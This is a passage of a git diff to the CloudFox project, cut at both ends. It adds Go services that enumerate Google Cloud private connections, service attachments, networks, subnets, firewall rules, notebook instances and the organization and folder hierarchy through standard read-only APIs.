GetPrivateConnections(projectID string) ([]PrivateConnection, error) { + ctx := context.Background() + service, err := s.getServiceNetworkingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") + } + + var connections []PrivateConnection + + // List connections for the project's networks + computeService, err := s.getComputeService(ctx) + if err != nil { + return nil, err + } + + // Get all networks + networks, err := computeService.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, network := range networks.Items { + networkName := fmt.Sprintf("projects/%s/global/networks/%s", projectID, network.Name) + + // List connections for this network + resp, err := service.Services.Connections.List("services/servicenetworking.googleapis.com"). + Network(networkName).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no connections + } + + for _, conn := range resp.Connections { + connection := PrivateConnection{ + Name: conn.Peering, + ProjectID: projectID, + Network: network.Name, + Service: conn.Service, + ReservedRanges: conn.ReservedPeeringRanges, + PeeringName: conn.Peering, + } + + // Determine accessible services based on the connection + connection.AccessibleServices = s.determineAccessibleServices(conn.Service) + + connections = append(connections, connection) + } + } + + return connections, nil +} + +// GetServiceAttachments retrieves PSC service attachments (producer side) +func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var attachments []ServiceAttachment + + req := service.ServiceAttachments.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for 
region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, attachment := range scopedList.ServiceAttachments { + sa := ServiceAttachment{ + Name: attachment.Name, + ProjectID: projectID, + Region: regionName, + TargetService: extractName(attachment.TargetService), + ConnectionPreference: attachment.ConnectionPreference, + EnableProxyProtocol: attachment.EnableProxyProtocol, + } + + // Extract NAT subnets + for _, subnet := range attachment.NatSubnets { + sa.NatSubnets = append(sa.NatSubnets, extractName(subnet)) + } + + // Count connected endpoints + if attachment.ConnectedEndpoints != nil { + sa.ConnectedEndpoints = len(attachment.ConnectedEndpoints) + } + + // Extract consumer accept/reject lists + for _, accept := range attachment.ConsumerAcceptLists { + sa.ConsumerAcceptLists = append(sa.ConsumerAcceptLists, accept.ProjectIdOrNum) + } + for _, reject := range attachment.ConsumerRejectLists { + sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) + } + + // Get IAM bindings for the service attachment + sa.IAMBindings = s.getServiceAttachmentIAMBindings(ctx, service, projectID, regionName, attachment.Name) + + attachments = append(attachments, sa) + } + } + return nil + }) + + return attachments, err +} + +// getServiceAttachmentIAMBindings retrieves IAM bindings for a service attachment +func (s *NetworkEndpointsService) getServiceAttachmentIAMBindings(ctx context.Context, service *compute.Service, projectID, region, attachmentName string) []ServiceAttachmentIAMBinding { + policy, err := service.ServiceAttachments.GetIamPolicy(projectID, region, attachmentName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []ServiceAttachmentIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, 
ServiceAttachmentIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { + // Map service names to what they provide access to + serviceMap := map[string][]string{ + "servicenetworking.googleapis.com": {"Cloud SQL", "Memorystore", "Filestore", "Cloud Build"}, + } + + if services, ok := serviceMap[service]; ok { + return services + } + return []string{service} +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 382db204..c54e79be 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -7,6 +7,8 @@ import ( "strings" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) @@ -57,17 +59,31 @@ type Endpoint struct { } type NetwworkService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new NetworkService (legacy - uses ADC directly) func New() *NetwworkService { return &NetwworkService{} } +// NewWithSession creates a NetworkService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { + return &NetwworkService{session: session} +} + +// getService returns a compute service, using cached wrapper if session is available +func (ns *NetwworkService) getService(ctx context.Context) (*compute.Service, error) { + if ns.session != nil { + return sdk.CachedGetComputeService(ctx, ns.session) + } + return compute.NewService(ctx) +} + // Returns firewall rules for a 
project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -108,7 +124,9 @@ func getIPAddressesForTargetTag(instances []ComputeEngineService.ComputeEngineIn var ips []string for _, instance := range instances { if contains(instance.Tags.Items, tag) { - ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + if len(instance.NetworkInterfaces) > 0 { + ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + } } } return ips, nil @@ -256,5 +274,244 @@ func parseFirewallRule(fw *compute.Firewall, projectID string) (FirewallRule, er }, nil } -// TODO -// func (ns *NetworkService) ForwardingRules() {} +// VPCInfo holds VPC network details +type VPCInfo struct { + Name string + ProjectID string + Description string + AutoCreateSubnetworks bool + RoutingMode string // REGIONAL or GLOBAL + Mtu int64 + Subnetworks []string + Peerings []VPCPeering + CreationTime string +} + +// VPCPeering holds VPC peering details +type VPCPeering struct { + Name string + Network string + State string + ExportCustomRoutes bool + ImportCustomRoutes bool + ExchangeSubnetRoutes bool +} + +// SubnetInfo holds subnet details +type SubnetInfo struct { + Name string + ProjectID string + Region string + Network string + IPCidrRange string + GatewayAddress string + PrivateIPGoogleAccess bool + Purpose string + StackType string + CreationTime string +} + +// FirewallRuleInfo holds enhanced firewall rule details for security analysis +type FirewallRuleInfo struct { + Name string + ProjectID string + Description string + Network string + Priority int64 + Direction string // INGRESS or EGRESS + Disabled bool + + // Source/Destination + SourceRanges []string + SourceTags []string + SourceSAs []string + DestinationRanges []string + TargetTags []string + TargetSAs []string + + // Traffic + 
AllowedProtocols map[string][]string // protocol -> ports + DeniedProtocols map[string][]string + + // Security analysis + IsPublicIngress bool // 0.0.0.0/0 in source ranges + IsPublicEgress bool // 0.0.0.0/0 in destination ranges + AllowsAllPorts bool // Empty ports = all ports + LoggingEnabled bool // Firewall logging enabled +} + +// Networks retrieves all VPC networks in a project +func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var networks []VPCInfo + + networkList, err := computeService.Networks.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, network := range networkList.Items { + info := VPCInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + Mtu: network.Mtu, + Subnetworks: network.Subnetworks, + CreationTime: network.CreationTimestamp, + } + + // Parse peerings + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, VPCPeering{ + Name: peering.Name, + Network: peering.Network, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + }) + } + + networks = append(networks, info) + } + + return networks, nil +} + +// Subnets retrieves all subnets in a project +func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var subnets []SubnetInfo + + // List subnets across all regions + subnetList, err := computeService.Subnetworks.AggregatedList(projectID).Do() + if err != nil { + return nil, err + } + + for _, scopedList := range subnetList.Items { + for _, subnet := 
range scopedList.Subnetworks { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Region: extractRegionFromURL(subnet.Region), + Network: extractNameFromURL(subnet.Network), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + StackType: subnet.StackType, + CreationTime: subnet.CreationTimestamp, + } + subnets = append(subnets, info) + } + } + + return subnets, nil +} + +// FirewallRulesEnhanced retrieves firewall rules with security analysis +func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var rules []FirewallRuleInfo + + firewallList, err := computeService.Firewalls.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, fw := range firewallList.Items { + info := FirewallRuleInfo{ + Name: fw.Name, + ProjectID: projectID, + Description: fw.Description, + Network: extractNameFromURL(fw.Network), + Priority: fw.Priority, + Direction: fw.Direction, + Disabled: fw.Disabled, + SourceRanges: fw.SourceRanges, + SourceTags: fw.SourceTags, + SourceSAs: fw.SourceServiceAccounts, + DestinationRanges: fw.DestinationRanges, + TargetTags: fw.TargetTags, + TargetSAs: fw.TargetServiceAccounts, + AllowedProtocols: make(map[string][]string), + DeniedProtocols: make(map[string][]string), + } + + // Parse allowed protocols + for _, allowed := range fw.Allowed { + info.AllowedProtocols[allowed.IPProtocol] = allowed.Ports + if len(allowed.Ports) == 0 { + info.AllowsAllPorts = true + } + } + + // Parse denied protocols + for _, denied := range fw.Denied { + info.DeniedProtocols[denied.IPProtocol] = denied.Ports + } + + // Security analysis - check for public ingress/egress + for _, source := range fw.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + 
info.IsPublicIngress = true + break + } + } + for _, dest := range fw.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + info.IsPublicEgress = true + break + } + } + + // Check if logging is enabled + if fw.LogConfig != nil && fw.LogConfig.Enable { + info.LoggingEnabled = true + } + + rules = append(rules, info) + } + + return rules, nil +} + +// Helper functions +func extractNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// GetComputeService returns a compute.Service instance for external use +func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { + return ns.getService(ctx) +} diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go new file mode 100644 index 00000000..5127bc73 --- /dev/null +++ b/gcp/services/notebooksService/notebooksService.go @@ -0,0 +1,223 @@ +package notebooksservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + notebooks "google.golang.org/api/notebooks/v1" +) + +type NotebooksService struct { + session *gcpinternal.SafeSession +} + +func New() *NotebooksService { + return &NotebooksService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { + return &NotebooksService{session: session} +} + +// getService returns a Notebooks service client using cached session if available +func (s *NotebooksService) getService(ctx context.Context) (*notebooks.Service, error) { + if s.session != nil { + return sdk.CachedGetNotebooksService(ctx, s.session) + } + return notebooks.NewService(ctx) +} + +// NotebookInstanceInfo represents a Vertex AI Workbench or 
legacy notebook instance +type NotebookInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + ProxyUri string `json:"proxyUri"` + Creator string `json:"creator"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Disk config + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + + // GPU config + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` + + // Other config + InstallGpuDriver bool `json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` +} + +// RuntimeInfo represents a managed notebook runtime +type RuntimeInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` +} + +// ListInstances retrieves all notebook instances +func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var instances []NotebookInstanceInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page 
*notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + return instances, nil +} + +// ListRuntimes retrieves all managed notebook runtimes +func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var runtimes []RuntimeInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Runtimes.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListRuntimesResponse) error { + for _, runtime := range page.Runtimes { + info := s.parseRuntime(runtime, projectID) + runtimes = append(runtimes, info) + } + return nil + }) + if err != nil { + // Runtimes API might not be available in all regions + return runtimes, nil + } + + return runtimes, nil +} + +func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID string) NotebookInstanceInfo { + info := NotebookInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + State: instance.State, + MachineType: extractName(instance.MachineType), + CreateTime: instance.CreateTime, + UpdateTime: instance.UpdateTime, + } + + // Service account + info.ServiceAccount = instance.ServiceAccount + + // Network config + info.Network = extractName(instance.Network) + info.Subnet = extractName(instance.Subnet) + info.NoPublicIP = instance.NoPublicIp + info.NoProxyAccess = instance.NoProxyAccess + + // Proxy URI and Creator + info.ProxyUri = instance.ProxyUri + info.Creator = instance.Creator + + // Boot disk + info.BootDiskType = instance.BootDiskType + 
info.BootDiskSizeGB = instance.BootDiskSizeGb + + // Data disk + info.DataDiskType = instance.DataDiskType + info.DataDiskSizeGB = instance.DataDiskSizeGb + + // GPU config + if instance.AcceleratorConfig != nil { + info.AcceleratorType = instance.AcceleratorConfig.Type + info.AcceleratorCount = instance.AcceleratorConfig.CoreCount + } + info.InstallGpuDriver = instance.InstallGpuDriver + + // Custom container + if instance.ContainerImage != nil { + info.CustomContainer = true + } + + return info +} + +func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { + info := RuntimeInfo{ + Name: extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, + } + + if runtime.VirtualMachine != nil { + info.RuntimeType = "VirtualMachine" + if runtime.VirtualMachine.VirtualMachineConfig != nil { + config := runtime.VirtualMachine.VirtualMachineConfig + info.MachineType = config.MachineType + info.Network = extractName(config.Network) + info.Subnet = extractName(config.Subnet) + } + } + + if runtime.AccessConfig != nil { + info.ServiceAccount = runtime.AccessConfig.RuntimeOwner + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/oauthService/oauthService.go b/gcp/services/oauthService/oauthService.go index 3f9fa5e7..46dab287 100644 --- a/gcp/services/oauthService/oauthService.go +++ b/gcp/services/oauthService/oauthService.go @@ -48,7 +48,7 @@ func (s *OAuthService) WhoAmI() (*Principal, error) { tokenInfo, err := queryTokenInfo(token.AccessToken) if err != nil { - return nil, fmt.Errorf(fmt.Sprintf("failed to 
retrieve metada of the token with error: %s", err.Error())) + return nil, fmt.Errorf("failed to retrieve metadata of the token with error: %w", err) } // Split the scope string into a slice of strings. scopes := strings.Split(tokenInfo.Scope, " ") diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go new file mode 100755 index 00000000..384e4fd2 --- /dev/null +++ b/gcp/services/organizationsService/organizationsService.go @@ -0,0 +1,581 @@ +package organizationsservice + +import ( + "context" + "fmt" + "strings" + + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" +) + +type OrganizationsService struct { + session *gcpinternal.SafeSession +} + +// New creates a new OrganizationsService +func New() *OrganizationsService { + return &OrganizationsService{} +} + +// NewWithSession creates an OrganizationsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *OrganizationsService { + return &OrganizationsService{session: session} +} + +// OrganizationInfo represents organization details +type OrganizationInfo struct { + Name string `json:"name"` // organizations/ORGANIZATION_ID + DisplayName string `json:"displayName"` + DirectoryID string `json:"directoryId"` // Cloud Identity directory ID + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// FolderInfo represents folder details +type FolderInfo struct { + Name string `json:"name"` // folders/FOLDER_ID + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime 
string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// ProjectInfo represents project details +type ProjectInfo struct { + Name string `json:"name"` // projects/PROJECT_ID + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + Labels map[string]string `json:"labels"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// HierarchyNode represents a node in the resource hierarchy +type HierarchyNode struct { + Type string `json:"type"` // organization, folder, project + ID string `json:"id"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` + Children []HierarchyNode `json:"children"` + Depth int `json:"depth"` +} + +// SearchOrganizations searches for organizations accessible to the caller +func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) { + ctx := context.Background() + var client *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var orgs []OrganizationInfo + + req := &resourcemanagerpb.SearchOrganizationsRequest{} + it := client.SearchOrganizations(ctx, req) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + orgInfo := OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.GetDirectoryCustomerId(), + State: org.State.String(), + } + if org.CreateTime 
!= nil { + orgInfo.CreateTime = org.CreateTime.AsTime().String() + } + if org.UpdateTime != nil { + orgInfo.UpdateTime = org.UpdateTime.AsTime().String() + } + if org.DeleteTime != nil { + orgInfo.DeleteTime = org.DeleteTime.AsTime().String() + } + + orgs = append(orgs, orgInfo) + } + + return orgs, nil +} + +// SearchFolders searches for folders under a given parent +func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + // Search for folders under the given parent + query := fmt.Sprintf("parent=%s", parent) + req := &resourcemanagerpb.SearchFoldersRequest{ + Query: query, + } + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchAllFolders searches for all accessible folders +func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err 
error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + req := &resourcemanagerpb.SearchFoldersRequest{} + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchProjects searches for projects +func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, error) { + ctx := context.Background() + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var projects []ProjectInfo + + query := "" + if parent != "" { + query = fmt.Sprintf("parent=%s", parent) + } + req := &resourcemanagerpb.SearchProjectsRequest{ + Query: query, + } + it := client.SearchProjects(ctx, req) + for { + project, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, 
gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + projectInfo := ProjectInfo{ + Name: project.Name, + ProjectID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State.String(), + Labels: project.Labels, + } + if project.CreateTime != nil { + projectInfo.CreateTime = project.CreateTime.AsTime().String() + } + if project.UpdateTime != nil { + projectInfo.UpdateTime = project.UpdateTime.AsTime().String() + } + if project.DeleteTime != nil { + projectInfo.DeleteTime = project.DeleteTime.AsTime().String() + } + + projects = append(projects, projectInfo) + } + + return projects, nil +} + +// GetProjectAncestry returns the ancestry path from project to organization +func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]HierarchyNode, error) { + ctx := context.Background() + + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var orgsClient *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer projectsClient.Close() + + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, 
"cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + var ancestry []HierarchyNode + resourceID := "projects/" + projectID + + // Track inaccessible folder IDs so we can try to find org via search + var inaccessibleFolderID string + + for { + if strings.HasPrefix(resourceID, "organizations/") { + orgID := strings.TrimPrefix(resourceID, "organizations/") + displayName := orgID // Default to numeric ID if we can't get display name + + // Try to get the org's display name + org, err := orgsClient.GetOrganization(ctx, &resourcemanagerpb.GetOrganizationRequest{Name: resourceID}) + if err == nil && org.DisplayName != "" { + displayName = org.DisplayName + } + + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: displayName, + }) + break + } else if strings.HasPrefix(resourceID, "folders/") { + folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) + if err != nil { + // Permission denied on folder - skip this folder and try to find the org + // Don't add the inaccessible folder to ancestry, just try to find the org + inaccessibleFolderID = strings.TrimPrefix(resourceID, "folders/") + + // Try to find the org by searching accessible orgs + orgsIter := orgsClient.SearchOrganizations(ctx, &resourcemanagerpb.SearchOrganizationsRequest{}) + for { + org, iterErr := orgsIter.Next() + if iterErr == iterator.Done { + break + } + if iterErr != nil { + break + } + // Add the first accessible org (best effort) + // The project likely belongs to one of the user's accessible orgs + orgID := strings.TrimPrefix(org.Name, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + }) + break + } + break + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + ancestry = append(ancestry, HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + 
resourceID = folder.Parent + } else if strings.HasPrefix(resourceID, "projects/") { + project, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) + if err != nil { + break + } + ancestry = append(ancestry, HierarchyNode{ + Type: "project", + ID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + }) + resourceID = project.Parent + } else { + break + } + } + + // Suppress unused variable warning + _ = inaccessibleFolderID + + // Reverse to go from organization to project + for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { + ancestry[i], ancestry[j] = ancestry[j], ancestry[i] + } + + // Set depth + for i := range ancestry { + ancestry[i].Depth = i + } + + return ancestry, nil +} + +// GetOrganizationIDFromProject returns the organization ID for a given project +// by walking up the resource hierarchy until it finds an organization +func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (string, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return "", err + } + + for _, node := range ancestry { + if node.Type == "organization" { + return node.ID, nil + } + } + + return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) +} + +// ------------------------------ +// HierarchyDataProvider Implementation +// ------------------------------ + +// GetProjectAncestryForHierarchy returns ancestry in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) GetProjectAncestryForHierarchy(projectID string) ([]gcpinternal.AncestryNode, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return nil, err + } + + result := make([]gcpinternal.AncestryNode, len(ancestry)) + for i, node := range ancestry { + result[i] = gcpinternal.AncestryNode{ + Type: node.Type, + ID: node.ID, + DisplayName: node.DisplayName, + Parent: node.Parent, + Depth: node.Depth, + } + } + return result, nil 
+} + +// SearchOrganizationsForHierarchy returns orgs in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) SearchOrganizationsForHierarchy() ([]gcpinternal.OrganizationData, error) { + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + result := make([]gcpinternal.OrganizationData, len(orgs)) + for i, org := range orgs { + result[i] = gcpinternal.OrganizationData{ + Name: org.Name, + DisplayName: org.DisplayName, + } + } + return result, nil +} + +// HierarchyProvider wraps OrganizationsService to implement HierarchyDataProvider +type HierarchyProvider struct { + svc *OrganizationsService +} + +// NewHierarchyProvider creates a HierarchyProvider from an OrganizationsService +func NewHierarchyProvider(svc *OrganizationsService) *HierarchyProvider { + return &HierarchyProvider{svc: svc} +} + +// GetProjectAncestry implements HierarchyDataProvider +func (p *HierarchyProvider) GetProjectAncestry(projectID string) ([]gcpinternal.AncestryNode, error) { + return p.svc.GetProjectAncestryForHierarchy(projectID) +} + +// SearchOrganizations implements HierarchyDataProvider +func (p *HierarchyProvider) SearchOrganizations() ([]gcpinternal.OrganizationData, error) { + return p.svc.SearchOrganizationsForHierarchy() +} + +// BuildHierarchy builds a complete hierarchy tree +func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { + // Get organizations + orgs, err := s.SearchOrganizations() + if err 